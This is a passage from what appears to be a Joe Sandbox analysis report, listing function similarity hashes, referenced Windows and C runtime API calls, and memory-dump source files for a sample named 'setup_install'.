                                        • API String ID: 1223908000-248832578
                                        • Opcode ID: 6ec695c95e5158b237a47780eb4b63e0ff4ebffa70a992a204c78cef1383d635
                                        • Instruction ID: 7c5a140b2f882e2409502ddfbc57286efd12684de14bcb6eba1c136744b6d7a0
                                        • Opcode Fuzzy Hash: 6ec695c95e5158b237a47780eb4b63e0ff4ebffa70a992a204c78cef1383d635
                                        • Instruction Fuzzy Hash: 31E0ECB59447008AD700BF79C94636BBAE2AB84308F45881DD48447206EB7DD484978B
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: freememcpystrlen
                                        • String ID:
                                        • API String ID: 2208669145-0
                                        • Opcode ID: 2ab6a6bb69dba4b81f6e1775bd98112014c63a5d641f68c432a64163843409ab
                                        • Instruction ID: 8cf230b4ccf6b73842d0ef041665cf0b6e575915a94c8fad3ab30edf6e7e9751
                                        • Opcode Fuzzy Hash: 2ab6a6bb69dba4b81f6e1775bd98112014c63a5d641f68c432a64163843409ab
                                        • Instruction Fuzzy Hash: DB318DB2608701CBD310AF16D4C036BBBE1AFC4755F158B3EE994A7381D339C845978A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: default arg#$}::
                                        • API String ID: 0-679881875
                                        • Opcode ID: 32b4d186b5db8985176cde08edd2a6a4ae9ce77ad432c124186f99cd8d709a3f
                                        • Instruction ID: df8a5a7b58b89c5634e62201303d10433436eb51da331394e4fc84ba8f50b12f
                                        • Opcode Fuzzy Hash: 32b4d186b5db8985176cde08edd2a6a4ae9ce77ad432c124186f99cd8d709a3f
                                        • Instruction Fuzzy Hash: EFB191706087418BC725DF28C0843ABBBE1EF95304F14883EE5D99B391C779A9859B9E
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: $!
                                        • API String ID: 3510742995-2056089098
                                        • Opcode ID: 75c4477164c01be47b3b09597491a462a9f5144fc4faaccd80ff11298ea9104a
                                        • Instruction ID: 95c6e66fab11958b81e94515d9c3f5e489eaffc74bae6fa6de571a43738e1890
                                        • Opcode Fuzzy Hash: 75c4477164c01be47b3b09597491a462a9f5144fc4faaccd80ff11298ea9104a
                                        • Instruction Fuzzy Hash: 08B109B0A097459FC720EF65C18469BFBE1FF88344F05892EE9C887315E738D8848B86
                                        APIs
                                          • Part of subcall function 0041AF30: LeaveCriticalSection.KERNEL32(?,?,?,?,-00000001,-00000001,00000010,0041B8EB), ref: 0041AF6E
                                        • memcpy.MSVCRT ref: 00414325
                                        • memcpy.MSVCRT ref: 00414360
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcpy$CriticalLeaveSection
                                        • String ID: $!
                                        • API String ID: 2458919216-2056089098
                                        • Opcode ID: 8767fbb23cffaea27ca8312533cfd15556063fd3abc04fb9b899746838427241
                                        • Instruction ID: dcbcd88c7fed299b8523145ed9cc907c76108574820f956a07f0c316ddc8a6cf
                                        • Opcode Fuzzy Hash: 8767fbb23cffaea27ca8312533cfd15556063fd3abc04fb9b899746838427241
                                        • Instruction Fuzzy Hash: 3EA106B0A097459FC720EF69C58469BBBE1FF88344F05892EE9D487315E738D8848B86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .${default arg#$}::
                                        • API String ID: 0-723286900
                                        • Opcode ID: c6d96b694c14d46351e9562ddc7aac9e33231580e7c868bcbb68f16a27e36913
                                        • Instruction ID: 01d6a81849b9b4822f1bd8be0a077cf41f5f6b5cef8e3d6b4fb02a6ce2fba00e
                                        • Opcode Fuzzy Hash: c6d96b694c14d46351e9562ddc7aac9e33231580e7c868bcbb68f16a27e36913
                                        • Instruction Fuzzy Hash: 4971307050C2418BDB118F28C0D47A97BE1AFA5314F1885BEECC99F38BC7B99885DB56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: parm#$this$}
                                        • API String ID: 0-728413427
                                        • Opcode ID: 163811b688975c9dd78eabbfcf878f230e2cc167fea6145db6e62a800b587d53
                                        • Instruction ID: f17c938f5f1025bd67bfc01c8bd0fa7bac11bb181cc9b4486b0677e15f3fb1f4
                                        • Opcode Fuzzy Hash: 163811b688975c9dd78eabbfcf878f230e2cc167fea6145db6e62a800b587d53
                                        • Instruction Fuzzy Hash: 07615D716082428BDB11CF28C0843A97BE1AFA5304F1985BEECC99F387D7799885DB55
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Time$FileSystem_errno
                                        • String ID:
                                        • API String ID: 3586254970-0
                                        • Opcode ID: d2752db180c2df1a463fce0996d50e30443b6d00ce03af71adc565c5a0394bf3
                                        • Instruction ID: daced355077f407e99694e3cb6d2ce24619376429e95316976637ccb96c1ab6a
                                        • Opcode Fuzzy Hash: d2752db180c2df1a463fce0996d50e30443b6d00ce03af71adc565c5a0394bf3
                                        • Instruction Fuzzy Hash: 06419271A547188BDB14AF79C98425EFBF9FF85320F11C66AE8A897390D730E9048F81
                                        APIs
                                        • GetHandleInformation.KERNEL32 ref: 649469E3
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: HandleInformation
                                        • String ID:
                                        • API String ID: 1064748128-0
                                        • Opcode ID: 2e2f61b1dd8639c77616c9bda67c8e4cf7ccc1a4fb5a5ad7a018274efe07c6ce
                                        • Instruction ID: dc4b27d07541621448e8b39a046eaf3cca54107ef609da23971f61619de46343
                                        • Opcode Fuzzy Hash: 2e2f61b1dd8639c77616c9bda67c8e4cf7ccc1a4fb5a5ad7a018274efe07c6ce
                                        • Instruction Fuzzy Hash: CD411AB0A842148BEB00EFA8D58469EBBF8BF54358F018469DD84DB345E735DC54CBA2
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strcmp
                                        • String ID: $ : $new
                                        • API String ID: 1004003707-2075650739
                                        • Opcode ID: 54a1f3b15e75e556ae4a08526f45cbc04c2a4a9daa3f8f8e4c0536ad089c2286
                                        • Instruction ID: e896db53eea95867ced8d68fa916d1d81f60a93489210ad328088d3cd8166fcc
                                        • Opcode Fuzzy Hash: 54a1f3b15e75e556ae4a08526f45cbc04c2a4a9daa3f8f8e4c0536ad089c2286
                                        • Instruction Fuzzy Hash: 08511935604205CFCB00DF29C49469AB7A2EF88314F15857AEC89AF386C778ED49CBC6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Value
                                        • String ID:
                                        • API String ID: 3702945584-0
                                        • Opcode ID: 33b88b8834fbe6f3c0af159b5a4f999a2b4467097efc515ec244bf0800c5cbf9
                                        • Instruction ID: 865464317089b01d0c3e25b9b84e2bc077b12f70de8e178a61d5b24cc6745f97
                                        • Opcode Fuzzy Hash: 33b88b8834fbe6f3c0af159b5a4f999a2b4467097efc515ec244bf0800c5cbf9
                                        • Instruction Fuzzy Hash: 1A31F5716882105BEB00AFF8E88829FBFA9FF55378F500669DA948B245E730D550CBD2
                                        APIs
                                        • IsDBCSLeadByteEx.KERNEL32 ref: 00411944
                                        • MultiByteToWideChar.KERNEL32 ref: 00411987
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: Byte$CharLeadMultiWide
                                        • String ID:
                                        • API String ID: 2561704868-0
                                        • Opcode ID: b38872788fdc4de985e96dea8950f440029120fd2e3aaf9adedd6c317788392b
                                        • Instruction ID: af85ae3eab4a50405ded313cbf3432a8e92160208b3caed7d899386cf6b2ea23
                                        • Opcode Fuzzy Hash: b38872788fdc4de985e96dea8950f440029120fd2e3aaf9adedd6c317788392b
                                        • Instruction Fuzzy Hash: 7C4115B05093418BD710DF28D49439BBBE0BF85354F04895EE9A48B3A1D77AD889CB47
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strcmp
                                        • String ID: QCJ$]
                                        • API String ID: 1004003707-3553567308
                                        • Opcode ID: 78f0943e3628e5689b910b50437b9676bbb2ba2166c1b7587110eccc59a692d6
                                        • Instruction ID: ad0e07d3056260a8657f94a9da1a2b18de45625cd502e455eb8b3b39b7363af8
                                        • Opcode Fuzzy Hash: 78f0943e3628e5689b910b50437b9676bbb2ba2166c1b7587110eccc59a692d6
                                        • Instruction Fuzzy Hash: 19411334204205CFCB10DF28C4847DABBE1EF59318F0985BAEC889F356C3B9A884DB95
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Handle$Close$InformationObjectSingleWait
                                        • String ID:
                                        • API String ID: 135186658-0
                                        • Opcode ID: a2f56fa6dcfd30a06bde27e87b22150673c4bf3aeb029c00b4c2007235ce4296
                                        • Instruction ID: 242a5a580e1d973c92ae3d0649bd098013b5281b1da3015ced89c91361213ba7
                                        • Opcode Fuzzy Hash: a2f56fa6dcfd30a06bde27e87b22150673c4bf3aeb029c00b4c2007235ce4296
                                        • Instruction Fuzzy Hash: 113124B0A443048BEF00EFA9D58479ABBF8AF49324F009569EC54DB345E738D814CFA2
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: callocfree
                                        • String ID: $
                                        • API String ID: 306872129-3993045852
                                        • Opcode ID: 8dd0efe56fb1d39f75cad6a02fc2287d3ba24b0852c37a67afbf16ba018f610a
                                        • Instruction ID: e8fd12c27b18095d7dbd431d6828c7af7e938401ab3f4da3a68f00a934616eb4
                                        • Opcode Fuzzy Hash: 8dd0efe56fb1d39f75cad6a02fc2287d3ba24b0852c37a67afbf16ba018f610a
                                        • Instruction Fuzzy Hash: EE318FB1A847019BE300DF25C18871AFFF4BF86394F444A2DE89887740E735E860CBA2
                                        APIs
                                        • calloc.MSVCRT ref: 649430DF
                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,64943212), ref: 6494312C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: callocfree
                                        • String ID:
                                        • API String ID: 306872129-0
                                        • Opcode ID: 154b97607bde053c75abbe7044b994ad0f82899e5a037b8120ea47c855b98287
                                        • Instruction ID: 9c193dc7c97605ab8bbaeedd558f3df8b4fe68065e48fb78a270ff64f86154a5
                                        • Opcode Fuzzy Hash: 154b97607bde053c75abbe7044b994ad0f82899e5a037b8120ea47c855b98287
                                        • Instruction Fuzzy Hash: AF318D71A843059FEB209F39C44478EBBF8EF89368F108929E9A8C7740E735D444CB92
                                        APIs
                                        • calloc.MSVCRT ref: 649438BD
                                        • free.MSVCRT(?,?,?,00000000,?,?,649439E0), ref: 6494394B
                                        • free.MSVCRT(?,?,?,00000000,?,?,649439E0), ref: 6494396F
                                          • Part of subcall function 64941E00: calloc.MSVCRT ref: 64941E3A
                                          • Part of subcall function 64941E00: CreateSemaphoreA.KERNEL32 ref: 64941E8E
                                          • Part of subcall function 64941E00: CreateSemaphoreA.KERNEL32 ref: 64941EB5
                                          • Part of subcall function 64941E00: InitializeCriticalSection.KERNEL32 ref: 64941ED4
                                          • Part of subcall function 64941E00: InitializeCriticalSection.KERNEL32 ref: 64941EDF
                                          • Part of subcall function 64941E00: InitializeCriticalSection.KERNEL32 ref: 64941EEA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
